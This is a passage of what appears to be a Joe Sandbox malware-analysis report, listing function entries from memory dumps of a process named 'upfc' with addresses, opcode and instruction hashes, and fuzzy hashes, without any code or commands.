                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17a0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ff49280dba48b573086c67b4b1b70c7ae051eefd0b0eef6d5a1ff9bd9ccc01b0
                                                      • Instruction ID: bc3d5327ae878411cfafe73cdf8d20f92472d6520a87d9856cbe6200b4b613a3
                                                      • Opcode Fuzzy Hash: ff49280dba48b573086c67b4b1b70c7ae051eefd0b0eef6d5a1ff9bd9ccc01b0
                                                      • Instruction Fuzzy Hash: 58D05B2090C546CBD754FE05944067862D1BF0C314F481070D41FC3187CF59E8618A15
                                                      Function 00007FF7C17906AD Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 38bafcb96ffc316238749f9f8e05cf376279ef606639981b862e7a8e05f1742f
                                                      • Instruction ID: e3360812ad67157e49a2fe52544bf8d073bf6ab0884494f9f5343ab31dc14ab2
                                                      • Opcode Fuzzy Hash: 38bafcb96ffc316238749f9f8e05cf376279ef606639981b862e7a8e05f1742f
                                                      • Instruction Fuzzy Hash: 19C04C06D7B55B01A6553A7F644A0ADE1545BCC734FF51572D50C50093ADCF60DD01B6
                                                      Function 00007FF7C1CA5D6D Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 44df57d3d549fed3c009eca1add16c2e812e3c4c2dc37b1799a5c2b156494cd8
                                                      • Instruction ID: 41e039886eb1c4757795ecae3ae870aabbb9a8802788cf066426dcceadcbdfdf
                                                      • Opcode Fuzzy Hash: 44df57d3d549fed3c009eca1add16c2e812e3c4c2dc37b1799a5c2b156494cd8
                                                      • Instruction Fuzzy Hash: 22D0C93080890DCFDF65EF58C444D6CB7E0EF28350B644475E00EDB260CA61E841CB90
                                                      Function 00007FF7C17912E8 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b46257708f436c5923578b8ae170b8e8b194bd4aeb4b50011f654afdbe41f5c
                                                      • Instruction ID: a2c726bdd079fd25279bf8f12db869c6b7d685c9014c091ce17eb88c97277c94
                                                      • Opcode Fuzzy Hash: 2b46257708f436c5923578b8ae170b8e8b194bd4aeb4b50011f654afdbe41f5c
                                                      • Instruction Fuzzy Hash: 2AC04C345518098FCA48FB3DC88591877A0FB1D215BD500A0E409C7271D659DCD5CB41
                                                      Function 00007FF7C1790B18 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c7a7ad0f78c49ac88e4e27d5cff6dad67509f45549e82e338b8b02ad93a7c8e
                                                      • Instruction ID: 7283d6c6dc003c9f23fb9fa5fd195916ba60a31d533111801245156e430fd33b
                                                      • Opcode Fuzzy Hash: 1c7a7ad0f78c49ac88e4e27d5cff6dad67509f45549e82e338b8b02ad93a7c8e
                                                      • Instruction Fuzzy Hash: 1AC04C305118198FCA44FB7DCA8595476A0FB0D225BD501E0E40DC7175E65A9C95C741
                                                      Function 00007FF7C1B803CB Relevance: .0, Instructions: 11COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 571990d60d7fdf04ddaece36516246cbd291d40705020bb80f63e8bb68e96a5f
                                                      • Instruction ID: d1ff4cd664851667746c1e901d66cccdc8898174e737bd4bba7968144f7df3a5
                                                      • Opcode Fuzzy Hash: 571990d60d7fdf04ddaece36516246cbd291d40705020bb80f63e8bb68e96a5f
                                                      • Instruction Fuzzy Hash: D7D09210A1D60786F7686E0140E027E91916F29BA0FA0653EC49F41DC189ACF5016B32
                                                      Function 00007FF7C179464B Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e716638f4cb1a5f92371f6f42ed5860cbe3fd9f0e02c8a8b436351c21992e45
                                                      • Instruction ID: 1b5ee89d35cf24bfd83b342292e3812841bf334ac8ae03212290c2dd1ef30d28
                                                      • Opcode Fuzzy Hash: 3e716638f4cb1a5f92371f6f42ed5860cbe3fd9f0e02c8a8b436351c21992e45
                                                      • Instruction Fuzzy Hash: EDC04C51E1CC1646F6596618441227E48525F95764F9405B4E11D873CBCE4D6A0102CB
                                                      Function 00007FF7C1790548 Relevance: .0, Instructions: 9COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 473bf2f2d6d738438761132f2a40cd3d6c140b2d05cc50790289fbb38b3576c1
                                                      • Instruction ID: 3f6c1ff9e85a8ada2744b1878be98a4358d47d032d6d5e0a17c7591d60fa8ed7
                                                      • Opcode Fuzzy Hash: 473bf2f2d6d738438761132f2a40cd3d6c140b2d05cc50790289fbb38b3576c1
                                                      • Instruction Fuzzy Hash: 64B01230CB760B81DB28FB730842068F160AF0E239FD006B4D40C41293D8EF50ED4652
                                                      Function 00007FF7C1B848EF Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 974c0e99b7bba5c3fb02bc41c0739676dc05b7a907bb06f935e941833c61eeb0
                                                      • Instruction ID: c6ef0858eeab47e4e21ed83e0498a7adf568a2438be4c5c15df0b18844ea197f
                                                      • Opcode Fuzzy Hash: 974c0e99b7bba5c3fb02bc41c0739676dc05b7a907bb06f935e941833c61eeb0
                                                      • Instruction Fuzzy Hash: E1C04880E0D2829AFB216DA4489227D97800B1A622BD6197AD20A8A5C3E88CA8059B31
                                                      Function 00007FF7C17906D0 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2f9a43a3e202649a4026ef8806b21b406c16f3f06bca05c6ccecb1836bb0331
                                                      • Instruction ID: d757702dd5d5df1c17d65b41af02f433d9c512b01fedf05a728ebd3ddb10a8d4
                                                      • Opcode Fuzzy Hash: c2f9a43a3e202649a4026ef8806b21b406c16f3f06bca05c6ccecb1836bb0331
                                                      • Instruction Fuzzy Hash: FFB01200C7640F01A544367B0846064F0406B4C230FD40070D80C50083A8CE109C0262
                                                      Function 00007FF7C1790528 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4240f07aa1fa7878a1268ac9f6d40dffa0b3b3bb61059715db6846cbbd43602e
                                                      • Instruction ID: 85e5956da6019c02cb3c63999fd8d7e82736a99af89d6a8b6ec8b105dc193566
                                                      • Opcode Fuzzy Hash: 4240f07aa1fa7878a1268ac9f6d40dffa0b3b3bb61059715db6846cbbd43602e
                                                      • Instruction Fuzzy Hash: 20B00204C5650B01E61435BB1D86569F5605B4D174FD511B0D81D405C798CD55BE5273
                                                      Function 00007FF7C17B2730 Relevance: .0, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8f8dd5cfd59d6fea0cce7bc41531324c98643eb989b25d3a6ed71fca89bc5ef
                                                      • Instruction ID: 991c125b40b45ed89068209832ff44504669fccc75bea71c611300afd620e4fe
                                                      • Opcode Fuzzy Hash: d8f8dd5cfd59d6fea0cce7bc41531324c98643eb989b25d3a6ed71fca89bc5ef
                                                      • Instruction Fuzzy Hash: 80A00204C9784E11A94875BB1D87094F4515BCD124FC91171EC4C802C7ECCE15ED02A3
                                                      Function 00007FF7C1CA64A4 Relevance: .0, Instructions: 5COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2419621c22a6592fccf92b3cfc5d48a016fd6323aed90e267d42cf0b71ad5d0c
                                                      • Instruction ID: 0ef5798e32229b489b5a6207549c921d9989d3941dded62b548ea74b9ffe23e4
                                                      • Opcode Fuzzy Hash: 2419621c22a6592fccf92b3cfc5d48a016fd6323aed90e267d42cf0b71ad5d0c
                                                      • Instruction Fuzzy Hash: A5B092A280C1A240E3227D20491A47EA9210F00220FB4047AB28A010C38CCCA2192862

                                                      Executed Functions

                                                      Function 00007FF7C1790D78 Relevance: .3, Instructions: 255COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1bfa5b9a1ac6e713360cd011dadb7945fe26239b7d480df938344bbcbe64eca5
                                                      • Instruction ID: 2ff94b8250c9abff73404679ad415ec7194e946f9bc634d8a3b361fb91fe97b7
                                                      • Opcode Fuzzy Hash: 1bfa5b9a1ac6e713360cd011dadb7945fe26239b7d480df938344bbcbe64eca5
                                                      • Instruction Fuzzy Hash: A491AF75E18A998FE785EB6C88687B9BBE1FF99320F4001BEC049C7792CBB81415C741
                                                      Function 00007FF7C17B5735 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: c689842237574f0a1eb1c9d3828372e2f306580da7c6d8ff280501c49dd2c477
                                                      • Instruction ID: 67b1095f27e1431100dc44387d77bdfb95f57079c0bfbee5707924a726faf552
                                                      • Opcode Fuzzy Hash: c689842237574f0a1eb1c9d3828372e2f306580da7c6d8ff280501c49dd2c477
                                                      • Instruction Fuzzy Hash: 4C11292064DBC54FC756E73A4814455BFA0EFAB21178905FBC489CB1E3DD28DC85C791
                                                      Function 00007FF7C17C2B29 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: 0c405bb16d69ef5a9fdaef3a27c2514f0b449c39a37678abaed2f7853a9dc87c
                                                      • Instruction ID: a306115d619700b98ab7eae5b536bc4d0596792946683ff9775b9d2f795469c5
                                                      • Opcode Fuzzy Hash: 0c405bb16d69ef5a9fdaef3a27c2514f0b449c39a37678abaed2f7853a9dc87c
                                                      • Instruction Fuzzy Hash: 53F06D7060E7C18FC70AAB388868545BFA0EE6720134A52DEC045CF5A3DA2DD889CB41
                                                      Function 00007FF7C17B56C9 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: e8abf95855478c06dea77390e2a6c7b7a669ff30c1aac60d37ecfbfdfbd842d8
                                                      • Instruction ID: ee1fde73a91f3b43eb669a6062ad29ddee3ea96a38a2dbe6727f3660f37d4577
                                                      • Opcode Fuzzy Hash: e8abf95855478c06dea77390e2a6c7b7a669ff30c1aac60d37ecfbfdfbd842d8
                                                      • Instruction Fuzzy Hash: 04F09B7054E3C04FC706DB798468545BF60EF5720174942EFC046CF5A3DA2DD845C741
                                                      Function 00007FF7C17CA449 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: eff58f61874c4ebd50a36a9e1063f9f8e33ade3ae81bf814259e7c042fe0efe1
                                                      • Instruction ID: d1797652a6d6570eedb609540f5fc64014a880b8d15a5255c06d7645322a8332
                                                      • Opcode Fuzzy Hash: eff58f61874c4ebd50a36a9e1063f9f8e33ade3ae81bf814259e7c042fe0efe1
                                                      • Instruction Fuzzy Hash: 75F06D7060E7C04FC70AAB348869944BF60EE6720134A52DFC045CB5A3DA29D889CB41
                                                      Function 00007FF7C17C18C9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: ee81c0db28a1db84f4c616b3b82a560dd8952e008ba97a00bf7aa4715d5b7bf5
                                                      • Instruction ID: 6806e62378b27d3eadddd5b6b4242a3f81369987e8f522b81bfb17f67b762777
                                                      • Opcode Fuzzy Hash: ee81c0db28a1db84f4c616b3b82a560dd8952e008ba97a00bf7aa4715d5b7bf5
                                                      • Instruction Fuzzy Hash: B1E0657194E7C04FC716AA358868455BFA0EF6722174941EEC045CF1E3DA1D8845C701
                                                      Function 00007FF7C17B9169 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 6ba3b73d6ff973fdfa05ee932f4d2208e6439473c895f13696eb3460a791a229
                                                      • Instruction ID: dc44915ff6a192f2a5e9be2d223d4abd9001f66310a0e4b1caeedc998ffd12c6
                                                      • Opcode Fuzzy Hash: 6ba3b73d6ff973fdfa05ee932f4d2208e6439473c895f13696eb3460a791a229
                                                      • Instruction Fuzzy Hash: 1DE01A7054E3C04FCB0AEB7488699457FA0AE6B21178A41DEC085CF5B3D22DD849C741
                                                      Function 00007FF7C17C1959 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 617a4857e36761a2456b6de9cded296ddb52579e8e0b0cc9a83a65703a0695a6
                                                      • Instruction ID: 2b98139cc889be2b6ea1fba835c0baea05cfff1879b8daa82d0365827af5c57e
                                                      • Opcode Fuzzy Hash: 617a4857e36761a2456b6de9cded296ddb52579e8e0b0cc9a83a65703a0695a6
                                                      • Instruction Fuzzy Hash: 70E01AB054E3C08FCB0AEB7488699457FA0AE6B21178A41DEC085CF5B3D22D9849C741
                                                      Function 00007FF7C17C7CD4 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: b60fef5259f552f3bd3bd9689b115bd7e57dc37aa640e111310fb6b4c54c856a
                                                      • Instruction ID: d4cf0da611ad1c9f44db81b8fac811cbc8f86a16499b52542e0f16b1eec5c2c5
                                                      • Opcode Fuzzy Hash: b60fef5259f552f3bd3bd9689b115bd7e57dc37aa640e111310fb6b4c54c856a
                                                      • Instruction Fuzzy Hash: BCE0C93044F7C44FCB56EB7588698597FB0EE5721074A84EEC189CB0A3D62D8849C701
                                                      Function 00007FF7C17B8FB9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 14821c0e34aa063c82afdf074ecdf176d6dd4a629408622ff3725e9bfd494b5c
                                                      • Instruction ID: 077aa2e3fa1154fb51cc68706d6a1198686a3a1f758485be5de67cd6e2f7fb0d
                                                      • Opcode Fuzzy Hash: 14821c0e34aa063c82afdf074ecdf176d6dd4a629408622ff3725e9bfd494b5c
                                                      • Instruction Fuzzy Hash: D9E09A6154E3C04FCB06AB7488699557FB0AE6B21178F45EEC186CF1B3E62D8849CB11
                                                      Function 00007FF7C17CAA19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: a512beb2f61e15d97c3df2a355be57425ca921119f8b04d735fd4845ec5c6da6
                                                      • Instruction ID: 7b190194b32ffe2fb7ba682e85ac9e6409857323fb22e78f9dab14b9ca580380
                                                      • Opcode Fuzzy Hash: a512beb2f61e15d97c3df2a355be57425ca921119f8b04d735fd4845ec5c6da6
                                                      • Instruction Fuzzy Hash: 83E01A7144E3C08FCB0AEF3488699547F60EE6721078B42EEC046CF5B3D62D8849CB11
                                                      Function 00007FF7C17A0A10 Relevance: 1.1, Instructions: 1085COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17a0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1129292d4297f6b8410fa13ec3dda2d0a53107d39a98bc2c0e81ae19548614bd
                                                      • Instruction ID: 20b7fdc8a7949c61cd8d46fd4f3088c322a570581ecc83588dcfb38568c865d1
                                                      • Opcode Fuzzy Hash: 1129292d4297f6b8410fa13ec3dda2d0a53107d39a98bc2c0e81ae19548614bd
                                                      • Instruction Fuzzy Hash: 4D72A470A1894A8FE759FF2984957B9B3A2FF9D320F544179D00EC3293DE78AC818791
                                                      Function 00007FF7C17A16EB Relevance: .7, Instructions: 653COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17a0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27fc6f6dbf709c20fa2bde8c6094513eceb8eed8de5ccce126dd1ff4f7477bd2
                                                      • Instruction ID: 21c6aae189f03775f5e1990d61e87c1509bb06242cf91f295bf9aaf7bcdc4859
                                                      • Opcode Fuzzy Hash: 27fc6f6dbf709c20fa2bde8c6094513eceb8eed8de5ccce126dd1ff4f7477bd2
                                                      • Instruction Fuzzy Hash: 0A229570A1894A8FE759FF2984557B9B3A1FF9D350F5446B9D00EC3283CE34B8968B81
                                                      Function 00007FF7C17B91A1 Relevance: .3, Instructions: 318COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c073de12935b1eaeddf22d2df96a707b6f53aca4973c8bb1c24a666ea0ccc4bf
                                                      • Instruction ID: e0963684d2722cf31a2a3d852f8a8f666efa0b40324f947e0334712daaaea226
                                                      • Opcode Fuzzy Hash: c073de12935b1eaeddf22d2df96a707b6f53aca4973c8bb1c24a666ea0ccc4bf
                                                      • Instruction Fuzzy Hash: 62A18470A189094FDB45FF2DC4986B9B7E2FF98364F504279D41DC7296DF38A8428B50
                                                      Function 00007FF7C17C2FF5 Relevance: .3, Instructions: 288COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9de868ee78f342108276e6e0385d8719615b57cfe9c5fe78ae4256ce27a8e784
                                                      • Instruction ID: 3711ab9a089b0d2279824005815f06227ac8a7ee51ba9bfa49be1cfa3824f66c
                                                      • Opcode Fuzzy Hash: 9de868ee78f342108276e6e0385d8719615b57cfe9c5fe78ae4256ce27a8e784
                                                      • Instruction Fuzzy Hash: D391E370A1C94A5FE788FF2D84657B5B392FF98361F448279D40EC3687CE68B8418B91
                                                      Function 00007FF7C17C1F70 Relevance: .1, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c1956c4b69d6b512c2ba49b625cc717445257f430081a176008c439a7306b27
                                                      • Instruction ID: 5864cbc063bf5ae8c9f736d72159bc4d421c6efc1f7492a95f402356b2217a37
                                                      • Opcode Fuzzy Hash: 9c1956c4b69d6b512c2ba49b625cc717445257f430081a176008c439a7306b27
                                                      • Instruction Fuzzy Hash: D841B431A089598FE755FF18C8647A9B7A1FF99324F4402BAC40DD7293CE686895CBC1
                                                      Function 00007FF7C1790908 Relevance: .1, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d49867a30479c50f79946d15ba11b3345fc86f3582e73c4fae7224a3762d29da
                                                      • Instruction ID: 9b4ad1c0e72a6ae5086112e2a43da609e4b6cb73fe4f2b2bdf9a8ea44726b337
                                                      • Opcode Fuzzy Hash: d49867a30479c50f79946d15ba11b3345fc86f3582e73c4fae7224a3762d29da
                                                      • Instruction Fuzzy Hash: D721A63130CC184FE768EA1CE88ADB977D1EB9932171501BAE58AC7266ED51EC9287C1
                                                      Function 00007FF7C179090D Relevance: .1, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.1413749183.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c882554d36b84bcc3a55f6c2286249b16809c4da072c9e66dedd3f85d47e028d
